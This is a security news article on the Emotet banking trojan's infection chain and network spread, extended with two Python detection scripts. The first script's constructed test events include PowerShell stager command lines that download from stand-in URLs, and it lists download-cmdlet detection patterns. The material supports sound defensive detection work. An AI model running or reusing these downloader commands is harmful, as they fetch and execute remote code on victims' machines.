Watch out for Emotet, the trojan that’s nearly a worm

Published: 10 August 2017

Network worms and Trojan malware are back with a vengeance. A good example is WannaCry, which infected hundreds of thousands of computers across the globe in May 2017. Now comes Emotet, malware with both worm and trojan characteristics that exploits weak admin passwords to spread across a victim's network.

SophosLabs has seen a surge in Emotet cases in the past week and has blocked it on customer computers. Its payload is a banking Trojan designed to steal the victim's online banking details. Labs researcher Tad Heppner described it this way:

Emotet is a trojan although it also contains the functionality necessary to be classified as a worm.  The primary distinction is that a trojan requires some degree of social engineering to trick a human into enabling the spread of the infection whereas a worm can spread to other systems without the aid of a user. Emotet downloads then executes other payloads, so even though its core component is not directly a worm, it does have the potential to download and execute another component to spread itself to other systems.

How it works

The initial infection is distributed via email spam.  Researchers pieced together the following sequence of events:

  • A spam email containing a download link arrives in the victim’s inbox.
  • The download link points to a Microsoft Word document.
  • The downloaded document contains VBA code that decodes and launches a PowerShell script.
  • The PowerShell script then attempts to download and run Emotet from several URLs in turn, so that the infection still succeeds if some of the download sites are already offline.
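The chain above (Office document, VBA, a PowerShell downloader with a list of fallback URLs) has a recognisable shape in process-creation telemetry: Word is not a normal parent of PowerShell. The following Python is an added example, not code from the article or from SophosLabs. It runs over constructed Sysmon-style process-creation records embedded in the block and flags Office-spawned PowerShell, raising the severity when a download cmdlet and two or more URLs are present. Decoding `-EncodedCommand` (base64 of the UTF-16LE script text) is a generalisation the article does not mention; the field names, sample command lines and `example.invalid` URLs are assumptions.

```python
import base64
import re

# Constructed Sysmon-style process-creation records (not real telemetry).
# The second record carries its script as -EncodedCommand, i.e. base64 of the
# UTF-16LE script text, which is the encoding PowerShell expects there.
_ENCODED = base64.b64encode(
    "(New-Object Net.WebClient).DownloadString('http://example.invalid/stage2')".encode("utf-16-le")
).decode("ascii")

SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": ("powershell.exe -nop -w hidden -c \"$u='http://example.invalid/a','http://example.invalid/b';"
                     "foreach($x in $u){try{(New-Object Net.WebClient).DownloadFile($x,'m.exe');break}catch{}}\"")},
    {"ParentImage": r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -EncodedCommand " + _ENCODED},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -c Get-Process"},
    {"ParentImage": r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -c Get-Date"},
]

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}
DOWNLOAD_RE = re.compile(
    r"downloadfile|downloadstring|downloaddata|invoke-webrequest|invoke-restmethod|start-bitstransfer", re.I)
URL_RE = re.compile(r"""https?://[^\s'"();]+""", re.I)
# PowerShell accepts any unique prefix of -EncodedCommand; cover the usual ones.
ENC_RE = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def expand_encoded(cmdline):
    """Append the decoded -EncodedCommand payload (base64 of UTF-16LE) so the
    detection regexes see the script text and not just the blob."""
    m = ENC_RE.search(cmdline)
    if not m:
        return cmdline
    try:
        return cmdline + " " + base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return cmdline


def classify(event):
    """Return None for an uninteresting event, else a finding with a severity."""
    parent, image = basename(event["ParentImage"]), basename(event["Image"])
    if parent not in OFFICE_PARENTS or image not in {"powershell.exe", "pwsh.exe"}:
        return None
    cmd = expand_encoded(event["CommandLine"])
    urls = URL_RE.findall(cmd)
    downloads = DOWNLOAD_RE.search(cmd) is not None
    # Office -> PowerShell alone is suspicious; a download cmdlet plus a list of
    # fallback URLs (the stager shape described above) pushes the severity up.
    severity = ("low", "medium", "high")[int(downloads) + int(len(urls) >= 2)]
    return {"parent": parent, "download_cmdlet": downloads, "urls": urls,
            "encoded": ENC_RE.search(event["CommandLine"]) is not None,
            "severity": severity}


def scan(events):
    return [f for f in (classify(e) for e in events) if f]


if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding)
```

In production the same parent/child rule belongs in the EDR or SIEM, and the `-EncodedCommand` expansion is the part most often forgotten: without it a stager that hides its URLs in the base64 blob scores as a bare Office-to-PowerShell launch.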

The Emotet components ship in a self-extracting WinRAR archive bundled with a large dictionary of weak and commonly used passwords. (Note: WinRAR is a Windows file compression tool.)

The password dictionary is used to gain access to other systems on the network. Once it has a working administrator credential, it copies itself to the hidden administrative shares C$ or Admin$ of those systems. The copy is often given the filename my.exe, but other filenames have been used.

Emotet contains an embedded list of strings from which it chooses two words to combine into the filename it uses at the time of initial infection. The choice is seeded with the hard disk volume ID, so a given infected system always ends up with the same filename.

It also downloads a self-updating component capable of fetching the latest copy of itself and other modules. This component is saved in the Windows directory as %windows%\<filename>.exe, where the filename consists of 8 hexadecimal digits.

Some of the other modules this component downloads are used to harvest credentials from other well-known applications, or to harvest email addresses from Outlook PST files for use in targeted spam.

When the updater component updates the main Emotet component, it replaces the parent file under the same filename, built from the same strings chosen earlier. It then installs and runs the updated executable as a Windows service.
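The two behaviours described in this section, a dictionary attack on administrator credentials followed by a copy into C$ or Admin$ under a predictable name, leave a correlatable trail in the Windows Security log. The Python below is an added example, not code from the article or from SophosLabs. It runs over constructed Security-log records embedded in the block and raises an alert when one source address produces a burst of failed logons (event 4625), then a successful logon (4624) to the same account, then file access on an administrative share (5145), tagging file names that match the my.exe and 8-hex-digit names reported above (Admin$ maps to the Windows directory, which is where the updater lands). Field names, thresholds and the sample addresses are assumptions; 5145 is only written when Detailed File Share auditing is enabled.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed Windows Security-log records, flattened to the fields the
# detection needs (not real telemetry). 4625 = failed logon, 4624 = successful
# logon, 5145 = network share object access ("Audit Detailed File Share").
SAMPLE_EVENTS = [
    # 10.0.0.5 runs a password list against the local Administrator account:
    # 20 failures in 40 seconds, then a success, then a write to ADMIN$.
    *({"Time": "2017-08-08T09:00:%02dZ" % s, "EventID": 4625,
       "IpAddress": "10.0.0.5", "TargetUserName": "Administrator"} for s in range(0, 40, 2)),
    {"Time": "2017-08-08T09:00:41Z", "EventID": 4624, "IpAddress": "10.0.0.5",
     "TargetUserName": "Administrator"},
    {"Time": "2017-08-08T09:00:43Z", "EventID": 5145, "IpAddress": "10.0.0.5",
     "ShareName": r"\\*\ADMIN$", "RelativeTargetName": "my.exe"},
    # 10.0.0.9: one mistyped password, then a normal logon and a file on a
    # non-administrative share, so no alert.
    {"Time": "2017-08-08T09:05:00Z", "EventID": 4625, "IpAddress": "10.0.0.9",
     "TargetUserName": "alice"},
    {"Time": "2017-08-08T09:05:10Z", "EventID": 4624, "IpAddress": "10.0.0.9",
     "TargetUserName": "alice"},
    {"Time": "2017-08-08T09:05:12Z", "EventID": 5145, "IpAddress": "10.0.0.9",
     "ShareName": r"\\*\Public", "RelativeTargetName": "report.docx"},
]

# Administrative shares: ADMIN$ (the Windows directory) and <drive>$.
ADMIN_SHARE_RE = re.compile(r"^\\\\\*\\(ADMIN\$|[A-Z]\$)$", re.I)
# Names the article reports: my.exe on the shares, 8 hex digits + .exe for the
# updater dropped into the Windows directory.
DROPPER_NAME_RE = re.compile(r"^(my\.exe|[0-9a-f]{8}\.exe)$", re.I)


def parse_time(s):
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%SZ")


def detect_share_spread(events, fail_threshold=10, window=timedelta(minutes=5)):
    """Per source IP: a burst of >= fail_threshold 4625s, followed by a 4624 and
    then a 5145 against an administrative share, all inside `window`."""
    by_ip = defaultdict(list)
    for e in sorted(events, key=lambda e: e["Time"]):
        by_ip[e["IpAddress"]].append(e)

    alerts = []
    for ip, evs in by_ip.items():
        failures = []        # timestamps of 4625s still inside the window
        compromised = None   # (account, time, failure count) once a 4624 follows the burst
        for e in evs:
            t = parse_time(e["Time"])
            failures = [f for f in failures if t - f <= window]
            if e["EventID"] == 4625:
                failures.append(t)
            elif e["EventID"] == 4624 and len(failures) >= fail_threshold:
                compromised = (e["TargetUserName"], t, len(failures))
            elif (e["EventID"] == 5145 and compromised
                  and t - compromised[1] <= window
                  and ADMIN_SHARE_RE.match(e["ShareName"])):
                name = e.get("RelativeTargetName", "").rsplit("\\", 1)[-1]
                alerts.append({
                    "source_ip": ip,
                    "account": compromised[0],
                    "failed_attempts": compromised[2],
                    "share": e["ShareName"],
                    "file": name,
                    "dropper_like_name": DROPPER_NAME_RE.match(name) is not None,
                })
    return alerts


if __name__ == "__main__":
    for alert in detect_share_spread(SAMPLE_EVENTS):
        print(alert)
```

The file-name tag is a hint, not the trigger: the article notes that other names have been used, so the alert fires on the logon pattern plus administrative-share access alone, and the name only raises confidence.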

Recent Dridex and Qbot infections have also been discovered on Emotet-infected machines. It’s possible that Emotet’s ability to download and execute other payloads is currently being used to deploy geotargeted payloads.

Defensive measures

The attacker behind this outbreak has reacted to Sophos' detections by creating new variants as the attacks persisted, taking advantage of Emotet's updating feature. They also changed the IP addresses the payloads were downloaded from.

Nevertheless, Sophos is protecting customers from the threat and has created a Knowledge Base Article with a full breakdown of variants detected.

SophosLabs detects Emotet components as:

  • Mal/Emotet
  • HPmal/Emotet
  • Troj/EmotMem-A

To guard against malware exploiting Microsoft vulnerabilities in general:

  • Stay on top of all patch releases and apply them quickly.
  • If at all possible, replace older Windows systems with the latest versions.

Other advice:

  • If you receive a Word document by email and don't know the sender, don't open it.
  • Block macros in Office documents.
  • Lock down file sharing across the network; Emotet's spread depends on reaching the C$ and Admin$ shares of other machines.
  • Make sure users do not have admin rights by default.
  • Enforce password best practices: a dictionary of weak and commonly used passwords is exactly what Emotet tries.
  • Use an anti-virus with an on-access scanner (also known as real-time protection).
  • Consider stricter email gateway settings.
  • Never turn off security features because an email or document says so.


Source: Naked Security
